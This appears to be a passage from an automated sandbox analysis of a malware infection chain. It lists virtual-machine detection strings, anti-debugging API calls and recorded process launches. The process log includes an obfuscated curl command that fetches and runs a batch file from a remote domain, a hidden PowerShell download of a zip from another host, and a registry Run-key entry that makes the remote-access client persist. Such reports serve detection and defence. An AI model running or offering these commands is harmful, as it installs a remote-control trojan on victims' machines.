                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008772000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                                  Source: explorer.exe, 00000016.00000000.1602380186.0000000006EDD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V rytllcpqlndyltx Bus Pipes
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB182000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processorft
                                  Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000E
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 b8 c1 67 22 50 4e-8b 1e 52 5b b1 3b 4a 34
                                  Source: explorer.exe, 00000016.00000003.2247809094.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&00000
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008834000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000086D5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD0021-224I
                                  Source: explorer.exe, 00000016.00000002.2440811565.00000000087F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008772000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000089C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor{-
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessorDTs
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 b8 c1 67 22 50 4e-8b 1e 52 5b b1 3b 4a 34VMware20,1
                                  Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipest
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorsys
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB182000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root PartitionPt
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008970000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}UE
                                  Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll./
                                  Source: explorer.exe, 00000016.00000000.1609515483.0000000008970000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: explorer.exe, 00000016.00000002.2412632825.0000000000A76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processord-
                                  Source: explorer.exe, 00000016.00000003.2250792493.0000000006ED5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
                                  Source: chrome.exe, 00000000.00000002.2487145456.000028EC03B10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V rytllcpqlndyltx Bus
                                  Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
                                  Source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                  Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: chrome.exe, 00000000.00000003.1816401838.000028EC02578000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration ServiceS
                                  Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000}
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorsY^
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr.
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                                  Source: curl.exe, 0000001E.00000003.1778104266.000001366F8D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition*+h
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000086D5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000087E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                                  Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceA
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                                  Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: VMWare
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.sys
                                  Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.21805430.B64.230522183005/22/2023
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionll;
                                  Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionllEQ
                                  Source: explorer.exe, 00000016.00000000.1609515483.00000000087E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=1292e4ad-0700-4406-abe9-f5f1f5a6abb7
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeAPI call chain: ExitProcess graph end nodegraph_37-94986
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeAPI call chain: ExitProcess graph end nodegraph_37-95343
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_11161D01
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,37_2_11147750
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11145440 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,37_2_11145440
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1108BF30 GetTokenInformation,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,IsValidSid,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,37_2_1108BF30
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,37_2_11093080
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,37_2_110310C0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_11161D01
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_1116DD89
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCA28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_6CCA28E1
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCA87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_6CCA87F5
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,37_2_110F4560
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,37_2_1111FCA0
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press EnterJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press EnterJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /fJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,37_2_1109E190
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,37_2_1109E910
                                  Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmpBinary or memory string: Program ManagerKO
                                  Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000002.2431995358.00000000043D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1602122423.00000000043D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: explorer.exe, 00000016.00000003.2240395779.0000000008909000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1609515483.0000000008834000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndX
                                  Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, client32.exeBinary or memory string: Progman
                                  Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2412632825.00000000009AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
                                  Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmpBinary or memory string: Progmanlock
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,37_2_11173A35
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,37_2_11173D69
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,37_2_11173CC6
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoA,37_2_1116B38E
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,37_2_11173933
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,37_2_111739DA
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,37_2_1117383E
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,37_2_11173D2D
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,37_2_11173C06
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,37_2_6CCB0F39
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,37_2_6CCB2089
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,37_2_6CCB21DC
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: EnumSystemLocalesA,37_2_6CCB2151
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,37_2_6CCB2175
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,37_2_6CCB02AD
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,37_2_6CCB2218
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,37_2_6CCB1CC1
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoA,37_2_6CCBDC99
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,37_2_6CCBDC56
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,37_2_6CCB1DB6
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,37_2_6CCB1EB8
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,37_2_6CCB1E5D
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,37_2_6CCAFAE1
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,37_2_6CCBDB7C
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,37_2_6CCB1680
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
